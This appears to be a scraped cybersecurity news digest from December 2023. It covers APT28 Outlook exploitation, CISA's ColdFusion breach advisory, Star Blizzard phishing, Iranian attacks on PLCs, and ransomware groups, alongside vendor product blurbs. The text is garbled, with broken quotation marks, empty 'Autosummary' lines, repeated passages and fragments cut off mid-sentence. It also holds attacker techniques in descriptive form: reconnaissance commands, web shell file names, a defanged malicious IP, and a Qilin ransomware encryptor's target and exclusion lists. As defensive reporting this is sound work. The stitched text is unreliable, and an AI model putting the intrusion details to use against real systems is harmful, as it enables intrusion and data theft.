The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said. "Autosummary:
"Autosummary:
The type of information varies from app to app, but in certain cases, it might also contain unencrypted content, which could range from backend directives for the app to the actual text displayed to a user in a notification. "Autosummary:
Additionally, beyond European Defense, Foreign Affairs, and Internal Affairs agencies, APT28"s focus extended to critical infrastructure organizations involved in energy production and distribution, pipeline infrastructure operations, and material handling, personnel, and air transportation. "Autosummary:
"Autosummary:
Threat actors breached US govt systems by exploiting Adobe ColdFusion flaw Pierluigi Paganini December 06, 2023 December 06, 2023 The U.S. CISA warns that threat actors are actively exploiting a critical vulnerability in Adobe ColdFusion to breach government agencies. "Forescout detailed the discovery of 21 new vulnerabilities in OT/IoT routers and open-source software elements. The “SIERRA:21 – Living on the Edge” report features research into Sierra Wireless AirLink cellular routers and some open-source components, such as TinyXML and OpenNDS. Sierra Wireless routers are popular — an open database of Wi-Fi networks shows 245,000 networks worldwide running Sierra Wireless for various applications. For example, Sierra Wireless routers are used for police vehicles connecting to a … More
The post 21 high-risk vulnerabilities in OT/IoT routers found appeared first on Help Net Security.
"Autosummary:
Regions with the highest number of exposed devices include: 68,605 devices in The United States 5,580 devices in Canada 3,853 devices in Australia 2,329 devices in France 1,001 devices in Thailand Among the 21 vulnerabilities, one has critical severity (CVSS score 9.6), nine have high severity, and 11 have medium severity. "Autosummary:
"The vulnerability in ColdFusion (CVE-2023-26360) presents as an improper access control issue and exploitation of this CVE can result in arbitrary code execution," CISA said, adding an unnamed federal agency was targeted between June and July 2023. "Autosummary:
Experts demonstrate a post-exploitation tampering technique to display Fake Lockdown mode Pierluigi Paganini December 06, 2023 December 06, 2023 Researchers devised a new post-exploitation tampering technique to trick users into believing that their iPhone is in Lockdown Mode. "Autosummary:
Hunters International threaten to publish more data stolen from Austal’s systems in the following days, including compliance documents, recruiting information, finance details, certifications, and engineering data. "Autosummary:
"Autosummary:
Single, Lightweight Agent To simplify security and reduce costs, Vulnerability Assessment deploys easily in minutes without a reboot, using the same agent and cloud-based console that powers all ThreatDown endpoint security technologies. The ThreatDown Vulnerability Assessment tool simplifies the process with features like a lightweight agent, quick vulnerability scans, accurate severity ratings based on CVSS and CISA guidelines, and integration with Security Advisor for tailored recommendations. Vulnerability Assessment Doesn’t Have To Be Hard While manually identifying vulnerabilities in third-party applications is a demanding task, following these structured steps can make the process more manageable. "Autosummary:
In the CSA, CISA shares several indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) used in the two attacks.Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Prioritize secure-by-default configurations, such as eliminating default passwords and implementing single sign-on (SSO) technology via modern open standards. "Unknown attackers have leveraged a critical vulnerability (CVE-2023-26360) in the Adobe ColdFusion application development platform to access government servers, the Cybersecurity and Infrastructure Security Agency (CISA) has shared. About the exploited vulnerability CVE-2023-26360 is a deserialization of untrusted data vulnerability that could lead to arbitrary code execution. Adobe disclosed and fixed the flaw in mid-March 2023, and said that it was “aware that CVE-2023-26360 has been exploited in the wild in very limited attacks”. CVE-2023-26360 … More
The post CISA: Adobe ColdFusion flaw leveraged to access government servers (CVE-2023-26360) appeared first on Help Net Security.
"Autosummary:
On June 26, 2023, attackers accessed another public-facing web server running Adobe ColdFusion, and again engaged in reconnaissance: they enumerated running processes, checked network connectivity, collected information about the web server and the OS, and checked for the presence of ColdFusion versions 2018 and 2016. "Autosummary:
"Autosummary:
"The Russia-based actor Star Blizzard (formerly known as SEABORGIUM, also known as Callisto Group/TA446/COLDRIVER/TAG-53/BlueCharlie) continues to successfully use spear-phishing attacks against targeted organizations and individuals in the UK, and other geographical areas of interest, for information-gathering activity.
The UK National Cyber Security Centre (NCSC), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Federal Bureau of Investigation (FBI), the US National Security Agency (NSA), the US Cyber National Mission Force (CNMF), the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the Canadian Centre for Cyber Security (CCCS), and the New Zealand National Cyber Security Centre (NCSC-NZ) assess that Star Blizzard is almost certainly subordinate to the Russian Federal Security Service (FSB) Centre 18.
Industry has previously published details of Star Blizzard. This advisory draws on that body of information.
This advisory raises awareness of the spear-phishing techniques Star Blizzard uses to target individuals and organizations. This activity is continuing through 2023.
To download a PDF version of this advisory, see Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns.
Since 2019, Star Blizzard has targeted sectors including academia, defense, governmental organizations, NGOs, think tanks and politicians.
Tar "
Autosummary:
The UK National Cyber Security Centre (NCSC), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Federal Bureau of Investigation (FBI), the US National Security Agency (NSA), the US Cyber National Mission Force (CNMF), the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the Canadian Centre for Cyber Security (CCCS), and the New Zealand National Cyber Security Centre (NCSC-NZ) assess that Star Blizzard is almost certainly subordinate to the Russian Federal Security Service (FSB) Centre 18. OVERVIEW The Russia-based actor Star Blizzard (formerly known as SEABORGIUM, also known as Callisto Group/TA446/COLDRIVER/TAG-53/BlueCharlie) continues to successfully use spear-phishing attacks against targeted organizations and individuals in the UK, and other geographical areas of interest, for information-gathering activity. Star Blizzard uses webmail addresses from different providers, including Outlook, Gmail, Yahoo and Proton mail in their initial approach [T1585.002], impersonating known contacts of the target or well-known names in the target’s field of interest or sector. TARGETING PROFILE Since 2019, Star Blizzard has targeted sectors including academia, defense, governmental organizations, NGOs, think tanks and politicians.Spear-phishing Link Star Blizzard sends spear-phishing emails with malicious links directly to credential-stealing sites, or to documents hosted on a file-sharing site, which then direct victims to credential-stealing sites. "In this Help Net Security interview, Carl Froggett, CIO at Deep Instinct, discusses emerging trends in ransomware attacks, emphasizing the need for businesses to use advanced AI technologies, such as deep learning (DL), for prevention rather than just detection and response. He also talks about the shift in budget priorities in 2024 toward ransomware prevention technologies. He foresees AI, particularly deep learning, becoming more integrated into business processes, automating workflows, and shaping workplace experiences. What … More
The post Advanced ransomware campaigns expose need for AI-powered cyber defense appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Carl Froggett, CIO at Deep Instinct, discusses emerging trends in ransomware attacks, emphasizing the need for businesses to use advanced AI technologies, such as deep learning (DL), for prevention rather than just detection and response. Additionally, as AI becomes fully integrated, younger generations won’t have the same hands-on experiences around workplace tasks like troubleshooting, outages, and security incidents, as much of this will be automated by AI.Because DL models understand the building blocks of malicious files, DL makes it possible to implement and deploy a predictive prevention-based security program – one that can predict future malicious behaviors, detecting and preventing unknown threats, ransomware, and zero-days. "Autosummary:
"Autosummary:
The National Cybersecurity Agency of France (ANSSI), in late October, also blamed the hacking outfit for targeting government entities, businesses, universities, research institutes, and think tanks since the second half of 2021 by taking advantage of various flaws, counting CVE-2023-23397, to deploy implants such as CredoMap. "Autosummary:
In what seems to be a typical supply chain attack, ALPHV aka BlackCat are now threatening some Tipalti customers, including Roblox and Twitch: “We are systematically reaching out to affected clients of Tipalti, the first batch (consisting of organizations with the most data exfiltrated), have been sent communications requesting initial contact.”Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "Resecurity and ICS Technologies IRAQ, a well-established ICT System Integration Company with HQ in Baghdad, Iraq, have joined forces to fortify cybersecurity, fraud prevention and risk intelligence measures nationwide. This strategic partnership is poised to bring intelligence-driven defensive solutions to Iraq, helping consumers and organizations safeguard their digital assets and combat the evolving threat landscape. Resecurity, headquartered in the United States, is renowned for its innovative cybersecurity products and threat intelligence services. Under the visionary … More
The post Resecurity and ICS Technologies join forces to improve cybersecurity in Iraq appeared first on Help Net Security.
"Autosummary:
Key highlights of the partnership: Advanced cybersecurity solutions: Resecurity, known for its advanced threat intelligence, threat hunting, incident response, and digital risk management solutions, will provide Iraq-based organizations with state-of-the-art cybersecurity tools to protect against a wide range of cyber threats. "Autosummary:
“In both incidents, Microsoft Defender for Endpoint (MDE) alerted of the potential exploitation of an Adobe ColdFusion vulnerability on public-facing web servers in the agency’s pre-production environment” - CISA The agency notes that "both servers were running outdated versions of software which are vulnerable to various CVEs.” "Autosummary:
Based on data from ESET, SpyLoan detection has increased throughout 2023, the threat being more prominent in Mexico, India, Thailand, Indonesia, Nigeria, Philippines, Egypt, Vietnam, Singapore, Kenya, Colombia, and Peru. "Autosummary:
"Russian state-backed hacking group Forest Blizzard (aka Fancy Bear, aka APT28) has been using a known Microsoft Outlook vulnerability (CVE-2023-23397) to target public and private entities in Poland, Polish Cyber Command has warned. Compromising email accounts and maintaining access to them APT28 is known for targeting government, non-governmental, energy and transportation organizations in the US, Europe, and the Middle East. The most recent attacks were detected and reported by the computer security incident response team … More
The post Russian hackers use old Outlook vulnerability to target Polish orgs (CVE-2023-23397) appeared first on Help Net Security.
"Autosummary:
At the time of the release of the patch, CVE-2023-23397 was known to have been leveraged as a zero-day by a Russia-based threat actor “in targeted attacks against a limited number of organizations in government, transportation, energy, and military sectors in Europe.” "Veeam Software released new Veeam Data Platform 23H2 update, including Veeam Backup & Replicationv12.1 release as well as Veeam ONE v12.1 and Veeam Recovery Orchestrator v7. This latest release from Veeam, with a focus on radical resilience, includes hundreds of new features and enhancements designed to not only protect enterprises’ most critical data, but to enable them with radical resilience to bounce forward from ransomware and cyber-attacks. “The latest Veeam Data Protection Trends Report found … More
The post Veeam Data Platform 23H2 update enhances resilience against ransomware appeared first on Help Net Security.
"Autosummary:
This latest release from Veeam, with a focus on radical resilience, includes hundreds of new features and enhancements designed to not only protect enterprises’ most critical data, but to enable them with radical resilience to bounce forward from ransomware and cyber-attacks. New features and enhancements include: AI-powered built-in Malware Detection Engine performs low-impact inline entropy and file system analysis during backup for immediate detection of ransomware and malicious file management activity. "Rambus has unveiled the availability of a Quantum Safe Engine (QSE) for integration into hardware security elements in ASICs, SoCs and FPGAs. Quantum computers will enable adversaries to break current asymmetric encryption, placing important data and assets at risk. The Rambus QSE IP core uses NIST-selected quantum-resistant algorithms to protect valuable data center and government hardware against attacks emerging in the post quantum computing era. “From AI, to streaming video, to email, the applications we … More
The post Rambus launches Quantum Safe Engine for data center and government hardware security appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Microsoft has identified a Russian-based nation-state threat actor tracked as Forest Blizzard (STRONTIUM, APT28, FANCYBEAR) actively exploiting CVE-2023-23397 to provide secret, unauthorized access to email accounts within Exchange servers: https://t.co/BzbQpELgWQ — Microsoft Threat Intelligence (@MsftSecIntel) December 4, 2023 The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. "Autosummary:
Below are the fifteen new tools added in Kali 2023.4: cabby - TAXII client implementation cti-taxii-client - TAXII 2 client library enum4linux-ng - Next generation version of enum4linux with additional features (a Windows/Samba enumeration tool) exiflooter - Finds geolocation on all image URLs and directories h8mail - Email OSINT & Password breach hunting tool Havoc - Modern and malleable post-exploitation command and control framework OpenTAXII - TAXII server implementation PassDetective - Scans shell command history to detect mistakenly written passwords, API keys, and secrets Portspoof - All 65535 TCP ports are always open & emulates services Raven - Lightweight HTTP file upload service ReconSpider - Most Advanced Open Source Intelligence (OSINT) Framework "OffSec (previously Offensive Security) has released Kali Linux 2023.4, the latest version of its penetration testing and digital forensics platform. New tools in Kali Linux 2023.4 The list of tools freshly added to Kali Linux includes: cabby – a TAXII client implementation cti-taxii-client – a TAXII 2 client library enum4linux-ng – Next generation version of enum4linux with additional features (a Windows/Samba enumeration tool) exiflooter – Finds geolocation info on all image URLs and directories h8mail … More
The post Kali Linux 2023.4 released: New tools, Kali for Raspberry Pi 5, and more! appeared first on Help Net Security.
"Autosummary:
"Autosummary:
According to Beaumont, one of HTC"s business units, CareTech, operated a vulnerable Citrix Netscaler device, which was exploited for initial access to the company"s network. "Autosummary:
"In their 2024 cybersecurity outlook, WatchGuard researchers forecast headline-stealing hacks involving LLMs, AI-based voice chatbots, modern VR/MR headsets, and more in the coming year. Companies and individuals are experimenting with LLMs to increase operational efficiency. But threat actors are learning how to exploit LLMs for their own malicious purposes as well. During 2024, the WatchGuard Threat Lab predicts that a smart prompt engineer ‒ whether a criminal attacker or researcher ‒ will crack the code … More
The post 2024 cybersecurity outlook: The rise of AI voice chatbots and prompt engineering innovations appeared first on Help Net Security.
"Autosummary:
AI-based vishing takes off in 2024 With approximately 3.4 million open cybersecurity jobs, and fierce competition for the talent that is available, more small- to midsized- companies will turn to trusted managed service and security service providers, known as MSPs and MSSPs, to protect them in 2024. "A cybersecurity budget is an allocation of resources, both financial and otherwise, dedicated to protecting an organization’s digital assets from cyber threats. This includes funds for security software, hardware, training, and personnel. A well-structured cybersecurity budget ensures that an organization is adequately prepared to detect, prevent, and respond to potential cyberattacks, thereby minimizing the risk of data breaches and other security incidents. In this Help Net Security round-up, we present segments from previously recorded videos … More
The post Maximizing cybersecurity on a budget appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
The flaws affect all major IBVs like AMI, Insyde, and Phoenix as well as hundreds of consumer and enterprise-grade devices from vendors, including Intel, Acer, and Lenovo, making it both severe and widespread. "Autosummary:
"Scammers are hijacking hotels’ Booking.com accounts and using them as part of a hotel booking scam aimed at tricking guests into sharing their payment card information. “Customers of multiple properties received email or in-app messages from Booking.com that purported to be from hotel owners requesting confirmation of payment details for upcoming stays,” Secureworks researchers warn. “The threat actors directed the victims to malicious URLs for inputting the information, and then used the details to withdraw … More
The post Booking.com customers targeted in hotel booking scam appeared first on Help Net Security.
"Autosummary:
The first email would set the stage for the ask, and the second one contained the URL to the documents, hosted on legitimate services (Google Drive, Dropbox, Mega, etc.). "Autosummary:
"Autosummary:
"Autosummary:
"Iran-affiliated attackers CyberAv3ngers continue to exploit vulnerable Unitronics programmable logic controllers (PLCs), US and Israeli authorities have said in a joint cybersecurity advisory. CyberAv3ngers targeting Unitronics PLCs CISA has recently confirmed that Iran-affiliated attackers took over a Unitronics Vision Series PLC at a water system facility in Pennsylvania, and urged other water authorities to promptly secure their Unitronics PLCs. The agency has advised them to change the default password and port used by the PLC, … More
The post CyberAv3ngers hit Unitronics PLCs at multiple US-based water facilities appeared first on Help Net Security.
"Autosummary:
Finally, they called on device manufacturers to do their part in securing OT devices by: Not shipping products with default passwords Avoiding the exposure of administrative interfaces to the internet Not imposing additional fees for security features Making sure the devices support MFA Other Iran-affiliated threat groups to look out for CyberAv3ngers are not the only Iranian cyber threat actors targeting Israeli and US entities, Check Point researchers pointed out. "Autosummary:
The DanaBot banking Trojan initially targeted Australia and Poland users, then it has expanded in other countries, including Italy, Germany, Austria, and as of September 2018, Ukraine. "Autosummary:
In October, the French cybersecurity agency (ANSSI) revealed that the Russian hackers had used the zero-click attack against government entities, businesses, universities, research institutes, and think tanks in France. "Autosummary:
The company has numerous well-known customers, including Twitch, Roblox, ZipRecruiter, Roku, GoDaddy, Canva, and X. "Over the past weekend, a ransomware group claimed that they allegedly gained access to confidential information belonging to Tipalti and its customers," Tipalti told BleepingComputer in a statement. "Autosummary:
“It has come to our attention that MeridianLink, in light of a significant breach compromising customer data and operational information, has failed to file the requisite disclosure under Item 1.05 of Form 8-K within the stipulated four business days, as mandated by the new SEC rules,” wrote ALPHV in a complaint that the group claimed to have filed with the US government. "Autosummary:
Ongoing Operations - a unit of Trellance, which specialises in disaster recovery and business recovery, providing cloud services to credit unions to ensure that their business activities "operate without interruption, even when nothing else seems to be going well." National Credit Union Administration (NCUA) spokesperson Joseph Adamoli told the media that several credit unions were informed at the start of this month by Ongoing Operations that it had been hit by a ransomware attack. "Autosummary:
Other highlights in this preview update The Windows 11 KB5032288 optional cumulative release comes with additional improvements and 11 bug fixes, some of the more important ones highlighted below: You might see Windows Spotlight set as the default background in the coming weeks. "Autosummary:
Later, in September, Cado warned about spiking P2Pinfect botnet activity targeting systems in the United States, Germany, the UK, Japan, Singapore, Hong Kong, and China. "Autosummary:
The company has numerous well-known customers, including Twitch, Roblox, ZipRecruiter, Roku, GoDaddy, Canva, and X. "Over the past weekend, a ransomware group claimed that they allegedly gained access to confidential information belonging to Tipalti and its customers," Tipalti told BleepingComputer in a statement. "Autosummary:
New P2PInfect bot targets routers and IoT devices Pierluigi Paganini December 04, 2023 December 04, 2023 Cybersecurity researchers discovered a new variant of the P2PInfect botnet that targets routers and IoT devices. "The Cybersecurity and Infrastructure Security Agency (CISA) is releasing a Cybersecurity Advisory (CSA) in response to confirmed exploitation of CVE-2023-26360 by unidentified threat actors at a Federal Civilian Executive Branch (FCEB) agency. This vulnerability presents as an improper access control issue impacting Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier). CVE-2023-26360 also affects ColdFusion 2016 and ColdFusion 11 installations; however, they are no longer supported since they reached end of life. Exploitation of this CVE can result in arbitrary code execution. Following the FCEB agency’s investigation, analysis of network logs confirmed the compromise of at least two public-facing servers within the environment between June and July 2023.
This CSA provides network defenders with tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), and methods to detect and protect against similar exploitation.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Autosummary: Threat actors were observed dropping the file d.txt —decoded as d.jsp —via POST command in addition to eight malicious artifacts ( hiddenfield.jsp , hiddenfield_jsp.class , hiddenfield_jsp.java , Connection.jsp , Connection_jsp.class , Connection_jsp.java , d_jsp.class , and d_jsp.java/ ).Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.MITRE: certutil [3] VirusTotal: File - a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 [4] Bleeping Computer: Stealthy New JavaScript Malware Infects Windows PCs with RATs [5] GitHub: Tas9er/ByPassGodzilla [6] MITRE: esentutl [7] Microsoft: Active Directory - SYSVOL [8] Microsoft:Restrict NTLM authentication policy settings, including incoming NTLM traffic from client computers, other member servers, or a domain controller.[8] VALIDATE SECURITY CONTROLS In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization"s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. This CSA provides network defenders with tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), and methods to detect and protect against similar exploitation.Organizations typically store external-facing services and resources—as well as servers used for DNS, file transfer protocol (FTP), mail, proxy, voice over internet protocol (VoIP)—and web servers in the DMZ.Organizations typically store external-facing services and resources—as well as servers used for DNS, file transfer protocol (FTP), mail, proxy, voice over internet protocol (VoIP)—and web servers in the DMZ.CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Incident 1 As early as June 26, 2023, threat actors obtained an initial foothold on a public-facing [T1190] web server running Adobe ColdFusion v2016.0.0.3 through exploitation of CVE-2023-26360.The threat actors also collected information about local [T1087.001] and domain [T1087.002] administrative user accounts while performing reconnaissance by using commands such as localgroup , net user , net user /domain , and ID .Had the attempt succeeded, the threat actors may have been able to change policies across compromised servers.[7] Note: During this incident, analysis strongly suggests that the threat actors likely viewed the data contained in the ColdFusion seed.properties file via the web shell interface. Incident 2 As early as June 2, 2023, threat actors obtained an initial foothold on an additional public-facing web server running Adobe ColdFusion v2021.0.0.2 via malicious IP address 125.227.50[.]97 through exploitation of CVE-2023-26360. Download the PDF version of this report: For a downloadable copy of IOCs, see: TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. "
Autosummary:
"Autosummary:
In the sample analyzed by BleepingComputer.com, the encryptor is configured by default with the following exclusions and targeting criteria: Processes to not terminate: "kvm", "qemu", "xen" Directories to exclude from encryption: "/boot/", "/proc/", "/sys/", "/run/", "/dev/", "/lib/", "/etc/", "/bin/", "/mbr/", "/lib64/", "/vmware/lifecycle/", "/vdtc/", "/healthd/" Files to exclude from encryption: "initrd", "vmlinuz", "basemisc.tgz", "boot.cfg", "bootpart.gz", "features.gz", "imgdb.tgz", "jumpstrt.gz", "onetime.tgz", "state.tgz", "useropts.gz" File extensions to exclude from encryption: "v00", "v01", "v02", "v03", "v04", "v05", "v06", "v07", "v08", "v09", "b00", "b01", "b02", "b03", "b04", "b05", "b06", "b07", "b08", "b09", "t00", "t01", "t02", "t03", "t04", "t05", "t06", "t07", "t08", "t09" Directories to target for encryption: "/home", "/usr/home", "/tmp", "/var/www", "/usr/local/www", "/mnt", "/media", "/srv", "/data", "/backup", "/var/lib/mysql", "/var/mail", "/var/spool/mail", "/var/vm", "/var/lib/vmware", "/opt/virtualbox", "/var/lib/xen", "/var/opt/xen", "/kvm", "/var/lib/docker", "/var/lib/libvirt", "/var/run/sr-mount", "/var/lib/postgresql", "/var/lib/redis", "/var/lib/mongodb", "/var/lib/couchdb", "/var/lib/neo4j", "/var/lib/cassandra", "/var/lib/riak", "/var/lib/influxdb", "/var/lib/elasticsearch" Files to target for encryption: "3ds", "3g2", "3gp", "7z", "aac", "abw", "ac3", "accdb", "ai", "aif", "aiff", "amr", "apk", "app", "asf", "asx", "atom", "avi", "bak", "bat", "bmp", "bup", "bz2", "cab", "cbr", "cbz", "cda", "cdr", "chm", "class", "cmd", "conf", "cow", "cpp", "cr2", "crdownload", "cs", "csv", "cue", "cur", "dat", "db", "dbf", "dds", "deb", "der", "desktop", "dmg", "dng", "doc", "docm", "dot", "dotm", "dotx", "dpx", "drv", "dtd", "dvi", "dwg", "dxf", "eml", "eps", "epub", "f4v", "fnt", "fon", "gam", "ged", "gif", "gpx", "gz", "h264", "hdr", "hpp", "hqx", "htm", "html", "ibooks", "ico", "ics", "iff", "image", "img", "indd", "iso", "jar", "java", "jfif", "jpe", "jpeg", "jpf", "jpg", "js", "json", "jsp", "key", "kml", "kmz", "log", "m4a", "m4b", "m4p", "m4v", "mcd", "mdbx", "mht", "mid", "mkv", "ml", "mobi", "mov", "mp3", "mp4", "mpa", "mpeg", "mpg", "msg", "nes", "numbers", "odp", "ods", "odt", "ogg", "ogv", "otf", "ova", "ovf", "pages", "parallels", "pcast", "pct", "pdb", "pdf", "pds", "pef", "php", "pkg", "pl", "plist", "png", "pptm", "prproj", "ps", "psd", "ptx", "py", "qcow", "qcow2", "qed", "qt", "r3d", "ra", "rar", "rm", "rmvb", "rtf", "rv", "rw2", "sh", "shtml", "sit", "sitx", "sketch", "spx", "sql", "srt", "svg", "swf", "tar", "tga", "tgz", "thmx", "tif", "tiff", "torrent", "ttf", "txt", "url", "vdi", "vhd", "vhdx", "vmdk", "vmem", "vob", "vswp", "vvfat", "wav", "wbmp", "webm", "webp", "wm", "wma", "wmv", "wpd", "wps", "xhtml", "xlsm", "xml", "xspf", "xvid", "yaml", "yml", "zip", "zipx" Configuring a list of virtual machines that should not be encrypted is also possible. The Qilin ransomware operation The Qilin ransomware operation was initially launched as "Agenda" in August 2022. "Autosummary:
In the last two years, North Korean Lazarus hackers have been linked to crypto heists against the Harmony blockchain bridge ($100 million in losses), the Nomad bridge ($190 million in losses), the Qubit Finance bridge ($80 million in losses), and the largest crypto hack ever after breaching the Ronin Network cross-chain bridge and stealing $620 million. "Autosummary:
The most popular of the trojanized software in this campaign are: 4K Video Donwloader Pro Aissessoft Mac Data Recovery Aiseesoft Mac Video Converter Ultimate AnyMP4 Android Data Recovery for Mac Downie 4 FonePaw Data Recovery Sketch Wondershare UniConverter 13 SQLPro Studio Artstudio Pro Kaspersky says that unlike the legitimate software, which are distributed as disk images, the trojanized versions are downloaded as PKG files. "Autosummary:
New Agent Raccoon malware targets the Middle East, Africa and the US Pierluigi Paganini December 03, 2023 December 03, 2023 Threat actors are using the Agent Raccoon malware in attacks against organizations in the Middle East, Africa and the U.S. Unit42 researchers uncovered a new backdoor named Agent Raccoon, which is being used in attacks against organizations in the Middle East, Africa, and "Autosummary:
"Autosummary:
"Autosummary:
"This urgent warning by HC3 signifies the seriousness to the Citrix Bleed vulnerability and the urgent need to deploy the existing Citrix patches and upgrades to secure our systems," said John Riggi, a cybersecurity and risk advisor for the American Hospital Association, a healthcare industry trade group that represents 5,000 hospitals and healthcare providers across the U.S. "This situation also demonstrates the aggressiveness by which foreign ransomware gangs, primarily Russian-speaking groups, continue to target hospitals and health systems. "Autosummary:
"Nearly 72% of applications in the financial services sector contain security flaws, according to Veracode. Despite the alarming figure, this rate of software vulnerability was the lowest of all industries analyzed and has improved since last year. The research also indicates that financial services organizations have benefitted significantly from automation through API usage and interactive security training, with the two factors lowering the chance of flaw introduction by 19% per month. In this Help Net … More
The post Key drivers of software security for financial services appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Attackers are exploiting three critical vulnerabilities in internet-facing Qlik Sense instances to deliver Cactus ransomware to target organizations, Arctic Wolf researchers have warned. The exploited vulnerabilities Qlik Sense is a business intelligence and data analytics solution popular with governmental organizations and enterprises. Attackers wielding Cactus ransomware have previously been seen breaching large commercial organizations by exploiting vulnerabilities in VPN appliances. The group also engages in double-extortion tactics. “Based on patch level Qlik Sense is likely … More
The post Qlik Sense flaws exploited in Cactus ransomware campaign appeared first on Help Net Security.
"Autosummary:
The attack After a successful exploitation, the attackers leveraged PowerShell and the Background Intelligent Transfer Service (BITS) to download the following tools that allow them to gain persistence and remotely control the system: Renamed ManageEngine UEMS executables posing as Qlik files The AnyDesk remote solution, pulled from the official site A Plink (PuTTY Link) binary renamed to putty.exe The attackers also uninstalled Sophos’ endpoint security solution, changed the admin password, set up an RDP tunnel via Plink and used it for lateral movement, analyzed disk space with WizTree and used rclone (renamed as svchost.exe) to exfiltrate data. "With the latest round of security updates, Apple has fixed two zero-day WebKit vulnerabilities (CVE-2023-42916, CVE-2023-42917) that “may have been exploited against versions of iOS before iOS 16.7.1.” About the vulnerabilities (CVE-2023-42916, CVE-2023-42917) CVE-2023-42916 is a out-of-bounds read flaw, while CVE-2023-42917 is a vulnerability allowing for exploitable memory corruption. Both affect WebKit, the Apple-developed browser engine used by the company’s Safari web browser and all web browsers on iOS and iPadOS. CVE-2023-42916 may lead to … More
The post Apple patches two zero-days used to target iOS users (CVE-2023-42916 CVE-2023-42917) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
CISA adds ownCloud and Google Chrome bugs to its Known Exploited Vulnerabilities catalog Pierluigi Paganini December 01, 2023 December 01, 2023 US CISA added ownCloud and Google Chrome vulnerabilities to its Known Exploited Vulnerabilities catalog. "Autosummary:
"When these images are parsed during boot, the vulnerability can be triggered and an attacker-controlled payload can arbitrarily be executed to hijack the execution flow and bypass security features like Secure Boot, including hardware-based Verified Boot mechanisms (like Intel Boot Guard, AMD Hardware-Validated Boot or ARM TrustZone-based Secure Boot)" - Binarly Planting malware in such a way ensures persistence on the system that is virtually undetected, as illustrated in past attacks leveraging infected UEFI components [1, 2]. "Cable launched Transaction Assurance, pioneering a new wave of financial crime compliance and transaction testing. “In recent years, we’ve witnessed a surge in compliance lapses, highlighted by billions in fines levied against major institutions for financial crime failures. These cases have brought to light gaps in existing protocols, including systemic failures in manual testing,” said Natasha Vernier, CEO, Cable. “These industry shortcomings are why we developed Transaction Assurance. It helps illuminate the vast, often untested … More
The post Cable Transaction Assurance enhances the efficacy of front-line financial crime controls appeared first on Help Net Security.
"Autosummary:
It offers banks, fintechs, and payment platforms the only fully automated and continuous effectiveness testing solution for financial transactions, ensuring strict adherence to regulatory requirements related to transaction monitoring as well as sanctions, Suspicious Activity Reports (SARs), and the “Travel Rule.” "Autosummary:
"Autosummary:
Black Basta Ransomware gang accumulated at least $107 million in Bitcoin ransom payments since early 2022 Pierluigi Paganini December 01, 2023 December 01, 2023 The Black Basta ransomware gang infected over 300 victims accumulating ransom payments exceeding $100 million since early 2022. "Autosummary:
The attackers are believed to be nation-state threat actors discovered by Palo Alto Network"s Unit 42, which reports seeing victims spanning various sectors, including government, telecommunications, education, real estate, retail, and non-profit organizations. "Autosummary:
Prime Minister of France Élisabeth Borne signed a circular last week requesting all government employees to uninstall foreign communication apps such as Signal, WhatsApp, and Telegram by December 8, 2023, in favor of a French messaging app named "Olvid." "Autosummary:
KB5032278 preview update (BleepingComputer) Other highlights in November"s preview update The Windows 10 KB5032278 optional cumulative release also comes with improvement and 18 bug fixes, some of the more significant ones highlighted below: If you use Home or Pro-consumer devices or non-managed business devices, you can get some of the newest experiences as soon as they are ready. "Because of reduced operations during the Western holidays and the upcoming new year, there won"t be a non-security preview release for the month of December 2023," Microsoft said. "If nothing else, Apple’s most recent emergency security update should be considered proof of an increasingly tense security environment.
Enterprises must understand that while Apple maintains a pretty solid ecosystem — certainly at present the most secure, even according to Cisco — that doesn’t mean it’s entirely safe, and every Apple customer needs to get wise to the growing proliferation of threats.
With more and more business users turning to the company’s solutions, it’s important to get ahead of the threat.
Autosummary:
Michael Covington, vice president of portfolio strategy at Jamf, explained: “These latest OS updates, which address bugs in Apple’s WebKit, show that attackers continue to focus on exploiting the framework that downloads and presents web-based content. Security researchers, meanwhile, continue to kick WebKit around in their attempt to find vulnerabilities before the bad guys do, and hopefully get an Apple security bounty payment for their trouble. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @malwrhunterteam, @Ionut_Ilascu, @LawrenceAbrams, @billtoulas, @serghei, @Seifreed, @BleepinComputer, @demonslay335, @fwosar, @pcrisk, @CorvusInsurance, @elliptic, @AWNetworks, @ShadowStackRE, @ddd1ms, @3xp0rtblog, @jgreigj, and @BrettCallow. Finally, researchers released some interesting information about ransomware, including Cactus ransomware exploiting Qlik Sense flaws to breach networks, and Black Basta ransomware believed to have made over $100 million. "Autosummary:
